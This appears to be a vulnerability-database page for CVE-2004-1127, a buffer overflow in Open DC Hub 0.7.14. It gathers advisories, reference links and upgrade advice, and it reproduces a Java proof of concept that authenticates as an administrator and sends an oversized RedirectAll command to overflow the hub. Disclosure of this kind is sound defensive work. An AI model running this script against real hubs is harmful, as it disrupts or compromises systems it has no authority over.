CVE-2004-1127
CVSS 10.0
Published: 2005-01-10 00:00:00
Revised: 2016-10-17 22:51:26

[Original] Buffer overflow in Open Dc Hub 0.7.14 allows remote attackers, with administrator privileges, to execute arbitrary code via a long RedirectAll command.


[CNNVD] OpenDCHub RedirectALL Buffer Overflow Vulnerability (CNNVD-200501-212)

        Open DC Hub is hub software for Direct Connect networks.
        A buffer overflow vulnerability exists in Open DC Hub 0.7.14.
        A remote attacker with administrator privileges can exploit it to execute arbitrary code by sending an overly long RedirectAll command.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1127
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1127
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-212
(Official data source) CNNVD

- Other links and resources

http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029383.html
(UNKNOWN)  FULLDISC  20041124 Buffer Overflow in Open Dc Hub 0.7.14
http://marc.info/?l=bugtraq&m=110144606411674&w=2
(UNKNOWN)  BUGTRAQ  20041124 Buffer Overflow in Open Dc Hub 0.7.14
http://www.gentoo.org/security/en/glsa/glsa-200411-37.xml
(UNKNOWN)  GENTOO  GLSA-200411-37
http://www.securityfocus.com/bid/11747
(VENDOR_ADVISORY)  BID  11747
http://xforce.iss.net/xforce/xfdb/18254
(VENDOR_ADVISORY)  XF  open-hub-redirectall-bo(18254)

- Vulnerability information

OpenDCHub RedirectALL Buffer Overflow Vulnerability
Critical  Buffer overflow
2005-01-10 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade to fix this security issue; it can be obtained from:
        http://sourceforge.net/projects/opendchub/files/

- Vulnerability information (24774)

Open DC Hub 0.7.14 Remote Buffer Overflow Vulnerability (EDBID:24774)
multiple remote
2004-11-24 Verified
0 Donato Ferrante
source: http://www.securityfocus.com/bid/11747/info

A remote buffer overflow vulnerability reportedly affects the Open DC Hub. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into finite process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.


/*
   Open Dc Hub (0.7.14) - Buffer Overflow - Proof Of Concept
   Coded by: Donato Ferrante
*/

import java.net.Socket;
import java.net.UnknownHostException;
import java.net.SocketTimeoutException;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.PrintStream;

public class OpenDcHub0714_BOF_poc {

    private static int PORT  = 53696;       // default Open DC Hub admin port
    private static int MAXSZ = 512;         // length of the oversized RedirectAll argument
    private static String VERSION = "0.1";

    public static void main(String [] args){

        System.out.println(
            "\n\n" +
            "Open Dc Hub - Buffer Overflow - Proof Of Concept\n" +
            "Version: " + VERSION + "\n"      +
            "coded by: Donato Ferrante\n"     +
            "e-mail: fdonato@autistici.org\n" +
            "web: www.autistici.org/fdonato\n\n"
        );

        // <host> and <admin_password> are required; <port> is optional.
        if(args.length <= 1){
            System.out.println(
                "Usage: java OpenDcHub0714_BOF_poc <host> <port> <admin_password>\n" +
                "Note:  default port is 53696.\n"
            );
            System.exit(-1);
        }

        String host = args[0];
        String admin_password = args[args.length - 1];
        int port = PORT;

        // Fall back to the default port if the port argument is missing or not numeric.
        try{
            if(args.length > 2)
                port = Integer.parseInt(args[1]);
        }catch(Exception e){ port = PORT; }

        try{
            Socket socket = new Socket(host, port);
            socket.setSoTimeout(10000);
            BufferedReader in_stream = new BufferedReader(new InputStreamReader(socket.getInputStream()));
            PrintStream out_stream   = new PrintStream(socket.getOutputStream());

            // Echo the hub's greeting lines.
            System.out.println(in_stream.readLine());
            System.out.println(in_stream.readLine());
            System.out.println(in_stream.readLine());
            System.out.println(in_stream.readLine());

            // Authenticate as administrator; RedirectAll is an admin-only command.
            System.out.println("Logging...");
            out_stream.println("$adminpass " + admin_password + "|\n");

            in_stream.readLine();
            String err = in_stream.readLine();

            // A null reply means the hub closed the connection; "bad" means the password was rejected.
            if(err == null || err.toLowerCase().indexOf("bad") >= 0){
                System.out.println("Login failed...");
                System.out.println("Exiting...");
                System.exit(-1);
            }
            else
                System.out.println("Logged in...");

            System.out.println("Building test string to inject...");
            String buff = build();
            Thread.sleep(1500);

            System.out.println("Injecting test string...");
            out_stream.println(buff);
            Thread.sleep(1500);

            System.out.println("Proof_Of_Concept terminated.");
            socket.close();

        }catch(SocketTimeoutException ste){ System.out.println("Socket timeout."); System.exit(-1); }
         catch(UnknownHostException uhe){ System.out.println("Host: " + host + " unknown.."); System.exit(-1); }
         catch(InterruptedException ie){ System.out.println("Thread warning..."); }
         catch(Exception ioe){ System.out.println("Unable to create the socket!"); System.exit(-1); }
    }

    // Builds a RedirectAll command whose argument is MAXSZ bytes of 'a' (0x61),
    // longer than the fixed-size buffer the hub copies it into.
    private static String build(){

        StringBuilder over = new StringBuilder(MAXSZ);
        for(int i = 0; i < MAXSZ; i++)
            over.append((char) 0x61);   // cast required: appending the int 0x61 would add the text "97"

        return "$RedirectAll " + over + "|\n";
    }
}


- Vulnerability information

12137
Open DC Hub RedirectAll Value Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A remote overflow exists in Open DC Hub. The product fails to properly check the size of a passed argument to the RedirectAll command resulting in a buffer overflow. With a specially crafted request, an attacker can execute code on the affected system.

- Timeline

2004-11-24 Unknown
2004-11-24 Unknown

- Solution

Upgrade to version 0.7.14-r2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Gentoo Linux has provided an updated package for its users. Instructions for installing this package are contained in the referenced Gentoo advisory.

- Related references

- Vulnerability author

